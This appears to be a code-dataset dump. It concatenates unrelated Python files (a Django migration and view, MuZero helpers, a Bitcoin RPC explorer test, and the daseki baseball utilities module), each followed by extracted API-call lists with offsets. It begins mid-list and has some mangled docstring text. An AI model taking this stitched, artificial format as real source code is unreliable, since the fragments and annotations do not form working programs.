(['"""Export"""', '(1)', '(120)', 'pos_y', '(100)', '(30)', '"""Export geometry (Ctrl + Enter)"""'], {}), "('Export', 1, 120, pos_y, 100, 30,\n 'Export geometry (Ctrl + Enter)')\n", (27828, 27900), False, 'import bpy\n'), ((27901, 27986), 'bpy.app.PushButton', 'bpy.app.PushButton', (['"""Exit"""', '(0)', '(220)', 'pos_y', '(100)', '(30)', '"""Terminate the script (Esc)"""'], {}), "('Exit', 0, 220, pos_y, 100, 30, 'Terminate the script (Esc)'\n )\n", (27919, 27986), False, 'import bpy\n'), ((27986, 28004), 'bpy.app.EndAlign', 'bpy.app.EndAlign', ([], {}), '()\n', (28002, 28004), False, 'import bpy\n'), ((3560, 3586), 'bpy.app.Window.EditMode', 'bpy.app.Window.EditMode', (['(1)'], {}), '(1)\n', (3583, 3586), False, 'import bpy\n'), ((3595, 3621), 'bpy.app.Window.EditMode', 'bpy.app.Window.EditMode', (['(0)'], {}), '(0)\n', (3618, 3621), False, 'import bpy\n'), ((17037, 17079), 'bpy.app.Object.Get', 'bpy.app.Object.Get', (["settings['bmesh_name']"], {}), "(settings['bmesh_name'])\n", (17055, 17079), False, 'import bpy\n'), ((28337, 28351), 'bpy.app.Exit', 'bpy.app.Exit', ([], {}), '()\n', (28349, 28351), False, 'import bpy\n'), ((28716, 28730), 'bpy.app.Exit', 'bpy.app.Exit', ([], {}), '()\n', (28728, 28730), False, 'import bpy\n'), ((4416, 4448), 'itertools.repeat', 'repeat', (['(None, None, None, None)'], {}), '((None, None, None, None))\n', (4422, 4448), False, 'from itertools import count, repeat\n'), ((21669, 21700), 'os.path.basename', 'os.path.basename', (['gmdc_filename'], {}), '(gmdc_filename)\n', (21685, 21700), False, 'import os\n'), ((21795, 21824), 'os.path.isfile', 'os.path.isfile', (['gmdc_filename'], {}), '(gmdc_filename)\n', (21809, 21824), False, 'import os\n'), ((24112, 24126), 'bpy.app.Exit', 'bpy.app.Exit', ([], {}), '()\n', (24124, 24126), False, 'import bpy\n'), ((8612, 8638), 'bpy.app.Window.EditMode', 'bpy.app.Window.EditMode', (['(1)'], {}), '(1)\n', (8635, 8638), False, 'import bpy\n'), ((8655, 8681), 'bpy.app.Window.EditMode', 'bpy.app.Window.EditMode', (['(0)'], {}), '(0)\n', (8678, 8681), False, 'import bpy\n'), ((23249, 23280), 'os.path.basename', 'os.path.basename', (['gmdc_filename'], {}), '(gmdc_filename)\n', (23265, 23280), False, 'import os\n'), ((28860, 28889), 'bpy.sys.makename', 'bpy.sys.makename', ([], {'ext': '""".gmdc"""'}), "(ext='.gmdc')\n", (28876, 28889), False, 'import bpy\n'), ((12227, 12234), 'itertools.count', 'count', ([], {}), '()\n', (12232, 12234), False, 'from itertools import count, repeat\n'), ((12376, 12383), 'itertools.count', 'count', ([], {}), '()\n', (12381, 12383), False, 'from itertools import count, repeat\n'), ((16076, 16089), 'struct.pack', 'pack', (['"""<L"""', 'x'], {}), "('<L', x)\n", (16080, 16089), False, 'from struct import pack\n'), ((21881, 21912), 'os.path.basename', 'os.path.basename', (['gmdc_filename'], {}), '(gmdc_filename)\n', (21897, 21912), False, 'import os\n'), ((9524, 9557), 'mathutils.Vector', 'BlenderVector', (['all_vertices[j][0]'], {}), '(all_vertices[j][0])\n', (9537, 9557), True, 'from mathutils import Vector as BlenderVector\n'), ((9610, 9643), 'mathutils.Vector', 'BlenderVector', (['all_vertices[j][1]'], {}), '(all_vertices[j][1])\n', (9623, 9643), True, 'from mathutils import Vector as BlenderVector\n')]
|
# Generated by Django 2.0.1 on 2018-01-12 12:04
from django.db import migrations, models
def populate_function_allowed(apps, schema_editor):
Classification = apps.get_model('metarecord', 'Classification')
for classification in Classification.objects.all():
classification.function_allowed = not classification.children.exists()
classification.save(update_fields=('function_allowed',))
class Migration(migrations.Migration):
dependencies = [
('metarecord', '0035_add_on_deletes'),
]
operations = [
migrations.AddField(
model_name='classification',
name='function_allowed',
field=models.BooleanField(default=False, verbose_name='function allowed'),
),
migrations.RunPython(populate_function_allowed, migrations.RunPython.noop)
]
|
[
"django.db.migrations.RunPython",
"django.db.models.BooleanField"
] |
[((762, 836), 'django.db.migrations.RunPython', 'migrations.RunPython', (['populate_function_allowed', 'migrations.RunPython.noop'], {}), '(populate_function_allowed, migrations.RunPython.noop)\n', (782, 836), False, 'from django.db import migrations, models\n'), ((674, 741), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'verbose_name': '"""function allowed"""'}), "(default=False, verbose_name='function allowed')\n", (693, 741), False, 'from django.db import migrations, models\n')]
|
from pathlib import Path
from typing import Set
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from diplomova_praca_lib.position_similarity.models import PositionMethod
from diplomova_praca_lib.position_similarity.position_similarity_request import available_images
from shared.utils import dir_files
@csrf_exempt
def video_images(request):
src = request.POST.get('src', '')
print(src)
files = [{"img_src": '/' + str(path)} for path in dir_files(Path(src[1:]).parent)]
return JsonResponse({'files': files}, status=200)
@csrf_exempt
def images_loaded_in_dataset(method:PositionMethod) -> Set[str]:
return available_images(method)
|
[
"diplomova_praca_lib.position_similarity.position_similarity_request.available_images",
"django.http.JsonResponse",
"pathlib.Path"
] |
[((555, 597), 'django.http.JsonResponse', 'JsonResponse', (["{'files': files}"], {'status': '(200)'}), "({'files': files}, status=200)\n", (567, 597), False, 'from django.http import JsonResponse\n'), ((692, 716), 'diplomova_praca_lib.position_similarity.position_similarity_request.available_images', 'available_images', (['method'], {}), '(method)\n', (708, 716), False, 'from diplomova_praca_lib.position_similarity.position_similarity_request import available_images\n'), ((520, 533), 'pathlib.Path', 'Path', (['src[1:]'], {}), '(src[1:])\n', (524, 533), False, 'from pathlib import Path\n')]
|
def dir_name(config, method):
if config.game.kind == "Breakthrough":
return "{}-breakthrough-{}".format(method, config.game.size)
elif config.game.kind == "Gym":
return "{}-gym-{}".format(method, config.game.name)
else:
print("Unknown game in config file.")
exit(-1)
def get_board_shape(config):
if config.game.kind == "Breakthrough":
return (config.game.history, config.game.size, config.game.size, 3)
elif config.game.kind == "Gym":
if config.game.name == "Breakout-v0":
return (config.game.history, 96, 96, 3)
else:
print("Gym not implemented for this game.")
exit(-1)
else:
print("Unknown game in config file.")
exit(-1)
def get_action_shape(config):
if config.game.kind == "Breakthrough":
return (config.game.size, config.game.size, 3)
elif config.game.kind == "Gym":
if config.game.name == "Breakout-v0":
return (4,)
else:
print("Gym not implemented for this game.")
exit(-1)
else:
print("Unknown game in config file.")
exit(-1)
import numpy as np
# scalar to categorical transformation.
def value_to_support(v, support_size):
# invertible transformation
scaled = np.sign(v) * ((np.sqrt(np.abs(v)+1)-1)) + 0.001*v
# clamp to support
clamped = np.clip(scaled, -support_size, support_size)
v1 = np.floor(clamped)
p1 = 1 - (clamped - v1)
v2 = v1 + 1
p2 = 1 - p1
result = np.zeros(shape=(support_size*2+1,))
result[int(v1) + support_size] = p1
if int(v2) + support_size < support_size*2+1:
result[int(v2) + support_size] = p2
return result
from tensorflow.keras import losses
def mu_loss_unrolled_cce(config):
def loss(y_true, y_pred):
policy_loss = 0.
for i in range(config.mu.unroll_steps):
policy_loss += losses.categorical_crossentropy(
y_true[:, i], y_pred[:, i]) / config.mu.unroll_steps
return policy_loss
return loss
def get_support_shape(x):
return (x or 0)*2+1
"""
## GAME SETTINGS, make sure this is coherent with the generator and evaluator
GAME = "breakthrough"
if GAME == "breakthrough":
BT_K = 5
HISTORY_LENGTH = 2
BOARD_SHAPE = (HISTORY_LENGTH, BT_K, BT_K, 3)
ACTION_PLANES = 3
ACTION_SHAPE = (BT_K, BT_K, ACTION_PLANES)
HIDDEN_PLANES = 16
HIDDEN_SHAPE = (BT_K, BT_K, HIDDEN_PLANES)
SUPPORT_SIZE = 1
elif GAME == "atari":
HISTORY_LENGTH = 8
BOARD_SHAPE = (HISTORY_LENGTH, 96, 96, 3)
ACTION_PLANES = 4 # breakout
ACTION_SHAPE = (ACTION_PLANES, )
HIDDEN_PLANES = 16
HIDDEN_SHAPE = (6, 6, HIDDEN_PLANES)
SUPPORT_SIZE = 300
SUPPORT_SHAPE = 2*SUPPORT_SIZE+1
# MUZERO SPECIFIC
N_UNROLL_STEPS = 5
N_TD_STEPS = 300
DISCOUNT = 0.997
WEIGHT_DECAY = 1e-4
REPLAY_BUFFER_SIZE = 5000 # SAVE THE LAST 5k GAMES
EPOCH_SIZE = 5*REPLAY_BUFFER_SIZE
BATCH_SIZE = 512
N_EPOCH = 50000
SAVE_REPLAY_BUFFER_FREQ = 64 # backup replay buffer every _ games
CHECKPOINT_FREQ = 5*EPOCH_SIZE # save model
EVALUATION_FREQ = 5*EPOCH_SIZE # evaluate model
"""
|
[
"numpy.abs",
"numpy.floor",
"numpy.zeros",
"numpy.clip",
"tensorflow.keras.losses.categorical_crossentropy",
"numpy.sign"
] |
[((1394, 1438), 'numpy.clip', 'np.clip', (['scaled', '(-support_size)', 'support_size'], {}), '(scaled, -support_size, support_size)\n', (1401, 1438), True, 'import numpy as np\n'), ((1449, 1466), 'numpy.floor', 'np.floor', (['clamped'], {}), '(clamped)\n', (1457, 1466), True, 'import numpy as np\n'), ((1541, 1580), 'numpy.zeros', 'np.zeros', ([], {'shape': '(support_size * 2 + 1,)'}), '(shape=(support_size * 2 + 1,))\n', (1549, 1580), True, 'import numpy as np\n'), ((1307, 1317), 'numpy.sign', 'np.sign', (['v'], {}), '(v)\n', (1314, 1317), True, 'import numpy as np\n'), ((2050, 2109), 'tensorflow.keras.losses.categorical_crossentropy', 'losses.categorical_crossentropy', (['y_true[:, i]', 'y_pred[:, i]'], {}), '(y_true[:, i], y_pred[:, i])\n', (2081, 2109), False, 'from tensorflow.keras import losses\n'), ((1330, 1339), 'numpy.abs', 'np.abs', (['v'], {}), '(v)\n', (1336, 1339), True, 'import numpy as np\n')]
|
from octopus.platforms.BTC.explorer import BitcoinExplorerRPC
from octopus.platforms.BTC.explorer import RPC_USER, RPC_PASSWORD, RPC_HOST
import unittest
class BitcoinExplorerTestCase(unittest.TestCase):
explorer = BitcoinExplorerRPC(host=('%s:%s@%s' % (RPC_USER, RPC_PASSWORD, RPC_HOST)))
blockhash = '00000000000000000024fb37364cbf81fd49cc2d51c09c75c35433c3a1945d04'
txid = '1b5bfc2681d40c872126919ccb1752de4cca42dcfc594899f2ef11db4b05bb39'
tx_raw = '0200000001686b654b40737f0daa1532f64e525dc925e60d075403d38cfb12ac9097764015040000006a473044022009ec3f26984906a813faae05d968ec06bf1c68883e09a00b6333126ea87d96b302201cf1d2b9165442aa178fdf772a3909c3d2ba69e454eb8660fa35df8645e3bcb60121022f2caec3ad2f3b174d048a0d46f4f6e8ba4e9d02f6bdbba64ac6817f7ac6c131ffffffff02060d0700000000001976a91407c5acae3abc91735a1471e275e33abbffada89088ac00581300000000001976a91432f2e30111e1dc45f415430ef082cb64225c538a88ac00000000'
wallet_address = '15wDxrRCn7YiCXdvqjcih6G8svrmq5AQSS'
script_hex = "76a82096b3fe1f4ec8fd076379267f72443bed81cc49c18a2913f7e1f0727f6f9f4fbf88ac"
script_asm = 'OP_DUP OP_SHA256 96b3fe1f4ec8fd076379267f72443bed81cc49c18a2913f7e1f0727f6f9f4fbf OP_EQUALVERIFY OP_CHECKSIG'
def testRPCCommand(self):
#######################
# HIGHT-LEVEL METHODS #
#######################
self.assertEqual(self.explorer.get_transaction(self.txid, 0), self.tx_raw)
self.assertEqual(len(self.explorer.get_block_by_hash(self.blockhash)), 18)
self.assertEqual(len(self.explorer.get_block_by_number(500000)), 18)
####################
# JSON-RPC METHODS #
####################
self.assertEqual(self.explorer.decoderawtransaction(self.tx_raw)['txid'], self.txid)
self.assertEqual(self.explorer.decodescript(self.script_hex)['asm'], self.script_asm)
self.assertEqual(len(self.explorer.getbestblockhash()), len(self.blockhash))
self.assertEqual(len(self.explorer.getblock(self.blockhash)), 18)
self.assertEqual(len(self.explorer.getblockchaininfo()), 11)
self.assertEqual(type(self.explorer.getblockcount()), int)
self.assertEqual(self.explorer.getblockhash(500000), self.blockhash)
# self.assertEqual(len(self.explorer.getchaintips()), 2)
self.assertEqual(type(self.explorer.getconnectioncount()), int)
self.assertEqual(type(self.explorer.getdifficulty()), float)
self.assertEqual(len(self.explorer.getinfo()), 16)
self.assertEqual(len(self.explorer.getmempoolinfo()), 5)
self.assertEqual(len(self.explorer.getmininginfo()), 8)
self.assertEqual(len(self.explorer.getnettotals()), 4)
self.assertEqual(type(self.explorer.getnetworkhashps()), float)
self.assertEqual(len(self.explorer.getnetworkinfo()), 13)
self.assertEqual(len(self.explorer.getpeerinfo()), 8)
self.assertEqual(type(self.explorer.getrawmempool()), list)
self.assertEqual(self.explorer.getrawtransaction(self.txid), self.tx_raw)
self.assertEqual(type(self.explorer.getreceivedbyaccount('')), float)
self.assertEqual(type(self.explorer.getreceivedbyaddress(self.wallet_address)), float)
self.assertEqual(len(self.explorer.gettxout(self.txid, 0)), 5)
self.assertEqual(len(self.explorer.gettxoutproof([self.txid])), 818)
self.assertEqual(type(self.explorer.getunconfirmedbalance()), float)
self.assertEqual(len(self.explorer.getwalletinfo()), 9)
self.assertEqual(type(self.explorer.help()), str)
self.assertEqual(len(self.explorer.validateaddress(self.wallet_address)), 6)
self.assertEqual(self.explorer.verifytxoutproof(self.explorer.gettxoutproof([self.txid])), [self.txid])
# Not tested
'''
self.explorer.abandontransaction()
self.explorer.addmultisigaddress()
self.explorer.addnode()
self.explorer.createmultisig()
self.explorer.createrawtransaction()
self.explorer.dumpprivkey()
self.explorer.encryptwallet()
self.explorer.estimatefee()
self.explorer.estimatepriority()
self.explorer.getaccountaddress()
self.explorer.getaccount()
self.explorer.getaddednodeinfo()
self.explorer.getaddressesbyaccount()
self.explorer.getbalance()
self.explorer.gettransaction()
self.explorer.keypoolrefill()
self.explorer.listaccounts()
self.explorer.listaddressgroupings()
self.explorer.listlockunspent()
self.explorer.listreceivedbyaccount()
self.explorer.listreceivedbyaddress()
self.explorer.listtransactions()
self.explorer.listunspent()
self.explorer.lockunspent()
self.explorer.prioritisetransaction()
self.explorer.sendfrom()
self.explorer.sendmany()
self.explorer.sendrawtransaction()
self.explorer.sendtoaddress()
self.explorer.settxfee()
self.explorer.signmessage()
self.explorer.signrawtransaction()
self.explorer.submitblock()
self.explorer.verifymessage()
self.explorer.walletlock()
self.explorer.walletpassphrase()
self.explorer.walletpassphrasechange()
'''
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(BitcoinExplorerTestCase)
unittest.TextTestRunner(verbosity=2).run(suite)
|
[
"unittest.TextTestRunner",
"octopus.platforms.BTC.explorer.BitcoinExplorerRPC",
"unittest.TestLoader"
] |
[((223, 295), 'octopus.platforms.BTC.explorer.BitcoinExplorerRPC', 'BitcoinExplorerRPC', ([], {'host': "('%s:%s@%s' % (RPC_USER, RPC_PASSWORD, RPC_HOST))"}), "(host='%s:%s@%s' % (RPC_USER, RPC_PASSWORD, RPC_HOST))\n", (241, 295), False, 'from octopus.platforms.BTC.explorer import BitcoinExplorerRPC\n'), ((5295, 5316), 'unittest.TestLoader', 'unittest.TestLoader', ([], {}), '()\n', (5314, 5316), False, 'import unittest\n'), ((5368, 5404), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {'verbosity': '(2)'}), '(verbosity=2)\n', (5391, 5404), False, 'import unittest\n')]
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Name: common.py
# Purpose: Commonly used tools across Daseki
#
# Authors: <NAME>
#
# Copyright: Copyright © 2014-16 <NAME> / cuthbertLab
# License: BSD, see license.txt
# ----------------------------------------------------------------------------
'''
Common is a collection of utility functions, objects, constants and dictionaries used
throughout daseki.
functions in common/ should not import anything from daseki except daseki.exceptionsDS
(except in tests and doctests).
For historical reasons all the (non-private) functions etc. of the common/
folder are available by importing common.
'''
# pylint: disable=wildcard-import
from typing import Any
from daseki.common.parallel import *
import enum
import inspect
import re
import os
import sys
import time
import tempfile
import weakref
from daseki.exceptionsDS import DasekiException
maxRetrosheetYear = 2015
class TeamNum(enum.IntEnum):
VISITOR = 0
HOME = 1
# tools for setup.py
def sourceFilePath():
'''
Get the Daseki directory that contains source files. This is not the same as the
outermost package development directory.
'''
dn = os.path.dirname
fpThis = inspect.getfile(sourceFilePath)
fpDS = dn(dn(fpThis))
# use retro as a test case
if 'retro' not in os.listdir(fpDS):
raise DasekiException('cannot find expected daseki directory: %s' % fpDS)
return fpDS
def dataFilePath():
return os.path.join(sourceFilePath(), 'dataFiles')
def dataRetrosheet():
return os.path.join(dataFilePath(), 'retrosheet')
def dataRetrosheetEvent():
return os.path.join(dataRetrosheet(), 'event')
def dataRetrosheetByType(gameType='regular'):
if gameType not in ('asg', 'post', 'regular'):
raise DasekiException('gameType must be asg, post, or regular, not {0}'.format(gameType))
return os.path.join(dataRetrosheetEvent(), gameType)
def gameLogFilePath():
return os.path.join(dataRetrosheet(), 'gamelog')
# ---------------------
def getDefaultRootTempDir():
'''
returns whatever tempfile.gettempdir() returns plus 'daseki'.
Creates the subdirectory if it doesn't exist:
>>> from daseki import common
>>> import tempfile
>>> t = tempfile.gettempdir()
>>> #_DOCS_SHOW t
<KEY>'
>>> import os
>>> common.getDefaultRootTempDir() == os.path.join(t, 'daseki')
True
'''
# this returns the root temp dir; this does not create a new dir
dstDir = os.path.join(tempfile.gettempdir(), 'daseki')
# if this path already exists, we have nothing more to do
if os.path.exists(dstDir):
return dstDir
else:
# make this directory as a temp directory
try:
os.mkdir(dstDir)
except OSError: # cannot make the directory
dstDir = tempfile.gettempdir()
return dstDir
# ---------------------
GAMEID_MATCH = re.compile(r'([A-Za-z][A-Za-z][A-Za-z])(\d\d\d\d)(\d\d)(\d\d)(\d?)')
class GameId(object):
'''
A GameId is a 12-character string that embeds information about
when and where a game was played. It is designed to uniquely identify
any game every played.
We can initialize a GameId object from a string:
>>> from daseki import common
>>> gid = common.GameId('SDN201304090')
>>> str(gid)
'SDN201304090'
>>> gid
<daseki.common.GameId SDN201304090>
>>> gid.year
2013
>>> gid.day
9
>>> gid.gameNum # always a string because of weird split double header A, B codes
'0'
>>> gid.homeTeam
'SDN'
Or we can construct the id from all the information:
>>> gid2 = common.GameId()
>>> gid2.homeTeam = 'ARI'
>>> gid2.year = 2000
>>> gid2.month = 9
>>> gid2.day = 22
>>> print(gid2)
ARI200009220
Last digit is optional:
>>> gid = common.GameId('SDN20130409')
>>> str(gid)
'SDN201304090'
'''
def __init__(self, gameId=None):
self.gameId = gameId
self.year = 0
self.month = 0
self.day = 0
self.gameNum = '0'
self.homeTeam = 'XXX'
if gameId is not None:
self.parse()
def __repr__(self):
return '<{0}.{1} {2}>'.format(self.__module__, self.__class__.__name__, str(self))
def __str__(self):
return '{s.homeTeam}{s.year:4d}{s.month:02d}{s.day:02d}{s.gameNum}'.format(s=self)
def parse(self):
gameId = self.gameId
matched = GAMEID_MATCH.match(gameId)
if not matched:
raise DasekiException('invalid gameId: %s' % gameId)
self.homeTeam = matched.group(1).upper()
self.year = int(matched.group(2))
self.month = int(matched.group(3))
self.day = int(matched.group(4))
self.gameNum = matched.group(5)
if self.gameNum == '':
self.gameNum = '0'
# ---------------------
ordinals = ['Zeroth', 'First', 'Second', 'Third', 'Fourth', 'Fifth',
'Sixth', 'Seventh', 'Eighth', 'Ninth', 'Tenth', 'Eleventh',
'Twelfth', 'Thirteenth', 'Fourteenth', 'Fifteenth',
'Sixteenth', 'Seventeenth', 'Eighteenth', 'Nineteenth',
'Twentieth', 'Twenty-first', 'Twenty-second']
def ordinalAbbreviation(value, plural=False):
'''Return the ordinal abbreviations for integers
>>> from daseki import common
>>> common.ordinalAbbreviation(3)
'rd'
>>> common.ordinalAbbreviation(255)
'th'
>>> common.ordinalAbbreviation(255, plural=True)
'ths'
:rtype: str
'''
valueHundreths = value % 100
post = ''
if valueHundreths in [11, 12, 13]:
post = 'th'
else:
valueMod = value % 10
if valueMod == 1:
post = 'st'
elif valueMod in [0, 4, 5, 6, 7, 8, 9]:
post = 'th'
elif valueMod == 2:
post = 'nd'
elif valueMod == 3:
post = 'rd'
if post != 'st' and plural:
post += 's'
return post
# -------------------------------------------------------------------------------
class Timer(object):
'''
An object for timing. Call it to get the current time since starting.
>>> from daseki import common
>>> t = common.Timer()
>>> now = t()
>>> now_now = t()
>>> now_now > now
True
Call `stop` to stop it. Calling `start` again will reset the number
>>> t.stop()
>>> stopTime = t()
>>> stopNow = t()
>>> stopTime == stopNow
True
All this had better take less than one second!
>>> stopTime < 1
True
'''
def __init__(self):
# start on init
self._tStart = time.time()
self._tDif = 0
self._tStop = None
def start(self):
'''
Explicit start method; will clear previous values.
Start always happens on initialization.
'''
self._tStart = time.time()
self._tStop = None # show that a new run has started so __call__ works
self._tDif = 0
def stop(self):
self._tStop = time.time()
self._tDif = self._tStop - self._tStart
def clear(self):
self._tStop = None
self._tDif = 0
self._tStart = None
def __call__(self):
'''Reports current time or, if stopped, stopped time.
'''
# if stopped, gets _tDif; if not stopped, gets current time
if self._tStop is None: # if not stopped yet
t = time.time() - self._tStart
else:
t = self._tDif
return t
def __str__(self):
if self._tStop is None: # if not stopped yet
t = time.time() - self._tStart
else:
t = self._tDif
return str(round(t, 3))
# ---------
def sortModules(moduleList):
'''
Sort a lost of imported module names such that most recently modified is
first. In ties, last access time is used then module name
Will return a different order each time depending on the last mod time
:rtype: list(str)
'''
sort = []
modNameToMod = {}
for mod in moduleList:
modNameToMod[mod.__name__] = mod
fp = mod.__file__ # returns the pyc file
stat = os.stat(fp)
lastmod = time.localtime(stat[8])
asctime = time.asctime(lastmod)
sort.append((lastmod, asctime, mod.__name__))
sort.sort()
sort.reverse()
# just return module list
return [modNameToMod[modName] for lastmod, asctime, modName in sort]
# ------------------------
class SlottedObjectMixin(object):
r'''
Provides template for classes implementing slots allowing it to be pickled
properly.
Only use SlottedObjects for objects that we expect to make so many of
that memory storage and speed become an issue. For instance an object representing
a single play or plate appearence.
>>> import pickle
>>> from daseki import common
>>> class BatAngle(common.SlottedObjectMixin):
... __slots__ = ('horizontal', 'vertical')
>>> s = BatAngle()
>>> s.horizontal = 35
>>> s.vertical = 20
>>> #_DOCS_SHOW out = pickle.dumps(s)
>>> #_DOCS_SHOW t = pickle.loads(out)
>>> t = s #_DOCS_HIDE -- cannot define classes for pickling in doctests
>>> t.horizontal, t.vertical
(35, 20)
'''
# CLASS VARIABLES #
__slots__ = ('__weakref__')
# SPECIAL METHODS #
def __getstate__(self):
if getattr(self, '__dict__', None) is not None:
state = getattr(self, '__dict__').copy()
else:
state = {}
slots = set()
for cls in self.__class__.mro():
slots.update(getattr(cls, '__slots__', ()))
for slot in slots:
sValue = getattr(self, slot, None)
if isinstance(sValue, weakref.ref):
sValue = sValue()
print('Warning: uncaught weakref found in %r - %s, will not be rewrapped' %
(self, slot))
state[slot] = sValue
if getattr(self, '__dict__', None) is not None:
print('We got a dict TOO!', getattr(self, '__class__'))
return state
def __setstate__(self, state):
# print('Restoring state {0}'.format(self.__class__))
for slot, value in state.items():
setattr(self, slot, value)
class ParentMixin(SlottedObjectMixin):
__slots__ = ('_parent',)
def __init__(self, parent=None):
self._parent = None
if parent is not None:
self.parent = parent
def __getstate__(self):
pValue = getattr(self, '_parent', None)
setattr(self, '_parent', None)
state = super().__getstate__()
state['_parent'] = pValue
return state
def __setstate__(self, state):
super().__setstate__(state)
pValue = getattr(self, '_parent', None)
try:
pValue = weakref.ref(pValue)
except TypeError:
pass # hard reference now...
setattr(self, '_parent', pValue)
def parentByClass(self, className):
'''
iterate through parents until one of the proper class is found.
'''
p = self.parent
if p is None:
return None
if p.__class__.__name__ == className:
return p
elif hasattr(p, 'parentByClass'):
return p.parentByClass(className)
else:
return None
def _getParent(self):
_p = self._parent
if _p is None:
return _p
elif isinstance(_p, weakref.ref):
return _p()
else:
return _p
def _setParent(self, referent):
if referent is None:
return
try:
self._parent = weakref.ref(referent)
# if referent is None, will raise a TypeError
# if referent is a weakref, will also raise a TypeError
# will also raise a type error for string, ints, etc.
# slight performance boost rather than checking if None
except TypeError:
self._parent = referent
parent = property(_getParent, _setParent)
# ------------------------------------------------------------------------------
def wrapWeakref(referent):
'''
utility function that wraps objects as weakrefs but does not wrap
already wrapped objects; also prevents wrapping the unwrapable 'None' type, etc.
>>> import weakref
>>> from daseki import common
>>> class Mock(object):
... pass
>>> a1 = Mock()
>>> ref1 = common.wrapWeakref(a1)
>>> ref1
<weakref at 0x101f29ae8; to 'Mock' at 0x101e45358>
>>> ref2 = common.wrapWeakref(ref1)
>>> ref2
<weakref at 0x101f299af; to 'Mock' at 0x101e45358>
>>> ref3 = common.wrapWeakref(5)
>>> ref3
5
'''
# if type(referent) is weakref.ref:
# if isinstance(referent, weakref.ref):
# return referent
try:
return weakref.ref(referent)
# if referent is None, will raise a TypeError
# if referent is a weakref, will also raise a TypeError
# will also raise a type error for string, ints, etc.
# slight performance boost rather than checking if None
except TypeError:
return referent
def unwrapWeakref(referent):
'''
Utility function that gets an object that might be an object itself
or a weak reference to an object. It returns obj() if it's a weakref or another callable.
and obj if it's not.
>>> from daseki import common
>>> class Mock(object):
... strong: Any
... weak: Any
>>> a1 = Mock()
>>> a2 = Mock()
>>> a2.strong = a1
>>> a2.weak = common.wrapWeakref(a1)
>>> common.unwrapWeakref(a2.strong) is a1
True
>>> common.unwrapWeakref(a2.weak) is a1
True
>>> common.unwrapWeakref(a2.strong) is common.unwrapWeakref(a2.weak)
True
'''
try:
return referent()
except TypeError:
return referent
def warn(*msg):
'''
To print a warning to the user, send a list of strings to this method.
Similar to printDebug but even if debug is off.
'''
msg = formatStr(msg)
sys.stderr.write(msg)
def formatStr(msg, *arguments, **keywords):
'''Format one or more data elements into string suitable for printing
straight to stderr or other outputs
>>> from daseki import common
>>> a = common.formatStr('test', '1', 2, 3)
>>> print(a)
test 1 2 3
<BLANKLINE>
'''
if 'format' in keywords:
formatType = keywords['format']
else:
formatType = None
msg = [msg] + list(arguments)
for i in range(len(msg)):
x = msg[i]
if isinstance(x, bytes):
msg[i] = x.decode('utf-8')
if not isinstance(x, str):
try:
msg[i] = repr(x)
except TypeError:
try:
msg[i] = x.decode('utf-8')
except AttributeError:
msg[i] = '<__repr__ failed for ' + x.__class__.__name__ + '>'
except AttributeError: # or something
msg[i] = '<__repr__ failed for ' + x.__class__.__name__ + '>'
if formatType == 'block':
return '\n*** '.join(msg)+'\n'
else: # catch all others
return ' '.join(msg)+'\n'
if __name__ == '__main__':
import daseki
daseki.mainTest()
|
[
"time.asctime",
"os.mkdir",
"os.stat",
"daseki.mainTest",
"daseki.exceptionsDS.DasekiException",
"tempfile.gettempdir",
"os.path.exists",
"time.time",
"inspect.getfile",
"sys.stderr.write",
"weakref.ref",
"os.listdir",
"time.localtime",
"re.compile"
] |
[((3001, 3077), 're.compile', 're.compile', (['"""([A-Za-z][A-Za-z][A-Za-z])(\\\\d\\\\d\\\\d\\\\d)(\\\\d\\\\d)(\\\\d\\\\d)(\\\\d?)"""'], {}), "('([A-Za-z][A-Za-z][A-Za-z])(\\\\d\\\\d\\\\d\\\\d)(\\\\d\\\\d)(\\\\d\\\\d)(\\\\d?)')\n", (3011, 3077), False, 'import re\n'), ((1293, 1324), 'inspect.getfile', 'inspect.getfile', (['sourceFilePath'], {}), '(sourceFilePath)\n', (1308, 1324), False, 'import inspect\n'), ((2694, 2716), 'os.path.exists', 'os.path.exists', (['dstDir'], {}), '(dstDir)\n', (2708, 2716), False, 'import os\n'), ((14199, 14220), 'sys.stderr.write', 'sys.stderr.write', (['msg'], {}), '(msg)\n', (14215, 14220), False, 'import sys\n'), ((15399, 15416), 'daseki.mainTest', 'daseki.mainTest', ([], {}), '()\n', (15414, 15416), False, 'import daseki\n'), ((1404, 1420), 'os.listdir', 'os.listdir', (['fpDS'], {}), '(fpDS)\n', (1414, 1420), False, 'import os\n'), ((1436, 1503), 'daseki.exceptionsDS.DasekiException', 'DasekiException', (["('cannot find expected daseki directory: %s' % fpDS)"], {}), "('cannot find expected daseki directory: %s' % fpDS)\n", (1451, 1503), False, 'from daseki.exceptionsDS import DasekiException\n'), ((2592, 2613), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (2611, 2613), False, 'import tempfile\n'), ((6724, 6735), 'time.time', 'time.time', ([], {}), '()\n', (6733, 6735), False, 'import time\n'), ((6962, 6973), 'time.time', 'time.time', ([], {}), '()\n', (6971, 6973), False, 'import time\n'), ((7120, 7131), 'time.time', 'time.time', ([], {}), '()\n', (7129, 7131), False, 'import time\n'), ((8263, 8274), 'os.stat', 'os.stat', (['fp'], {}), '(fp)\n', (8270, 8274), False, 'import os\n'), ((8293, 8316), 'time.localtime', 'time.localtime', (['stat[8]'], {}), '(stat[8])\n', (8307, 8316), False, 'import time\n'), ((8335, 8356), 'time.asctime', 'time.asctime', (['lastmod'], {}), '(lastmod)\n', (8347, 8356), False, 'import time\n'), ((12989, 13010), 'weakref.ref', 'weakref.ref', (['referent'], {}), '(referent)\n', (13000, 13010), False, 'import weakref\n'), ((2825, 2841), 'os.mkdir', 'os.mkdir', (['dstDir'], {}), '(dstDir)\n', (2833, 2841), False, 'import os\n'), ((4626, 4672), 'daseki.exceptionsDS.DasekiException', 'DasekiException', (["('invalid gameId: %s' % gameId)"], {}), "('invalid gameId: %s' % gameId)\n", (4641, 4672), False, 'from daseki.exceptionsDS import DasekiException\n'), ((10943, 10962), 'weakref.ref', 'weakref.ref', (['pValue'], {}), '(pValue)\n', (10954, 10962), False, 'import weakref\n'), ((11797, 11818), 'weakref.ref', 'weakref.ref', (['referent'], {}), '(referent)\n', (11808, 11818), False, 'import weakref\n'), ((2916, 2937), 'tempfile.gettempdir', 